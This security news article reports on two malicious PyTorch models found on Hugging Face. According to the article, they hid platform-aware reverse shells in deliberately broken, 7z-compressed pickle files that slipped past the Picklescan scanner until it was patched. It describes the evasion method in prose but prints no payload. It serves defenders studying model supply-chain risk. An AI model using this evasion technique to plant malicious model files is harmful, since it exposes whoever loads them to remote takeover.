Malicious ML Models on Hugging Face Leverage Broken Pickle Format to Evade Detection
thehackernews.com
Feb 08, 2025Ravie LakshmananArtificial Intelligence / Supply Chain SecurityCybersecurity researchers have uncovered two malicious machine learning (ML) models on Hugging Face that leveraged an unusual technique of "broken" pickle files to evade detection."The pickle files extracted from the mentioned PyTorch archives revealed the malicious Python content at the beginning of the file," ReversingLabs researcher Karlo Zanki said in a report shared with The Hacker News. "In both cases, the malicious payload was a typical platform-aware reverse shell that connects to a hard-coded IP address."The approach has been dubbed nullifAI, as it involves clearcut attempts to sidestep existing safeguards put in place to identify malicious models. The Hugging Face repositories have been listed below -glockr1/ballr7who-r-u0000/0000000000000000000000000000000000000It's believed that the models are more of a proof-of-concept (PoC) than an active supply chain attack scenario.The pickle serialization format, used common for distributing ML models, has been repeatedly found to be a security risk, as it offers ways to execute arbitrary code as soon as they are loaded and deserialized.The two models detected by the cybersecurity company are stored in the PyTorch format, which is nothing but a compressed pickle file. While PyTorch uses the ZIP format for compression by default, the identified models have been found to be compressed using the 7z format.Consequently, this behavior made it possible for the models to fly under the radar and avoid getting flagged as malicious by Picklescan, a tool used by Hugging Face to detect suspicious Pickle files."An interesting thing about this Pickle file is that the object serialization the purpose of the Pickle file breaks shortly after the malicious payload is executed, resulting in the failure of the object's decompilation," Zanki said.Further analysis has revealed that such broken pickle files can still be partially deserialized owing to the discrepancy between Picklescan and how deserialization works, causing the malicious code to be executed despite the tool throwing an error message. The open-source utility has since been updated to rectify this bug."The explanation for this behavior is that the object deserialization is performed on Pickle files sequentially," Zanki noted."Pickle opcodes are executed as they are encountered, and until all opcodes are executed or a broken instruction is encountered. In the case of the discovered model, since the malicious payload is inserted at the beginning of the Pickle stream, execution of the model wouldn't be detected as unsafe by Hugging Face's existing security scanning tools."Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.SHARE
0 Reacties ·0 aandelen ·42 Views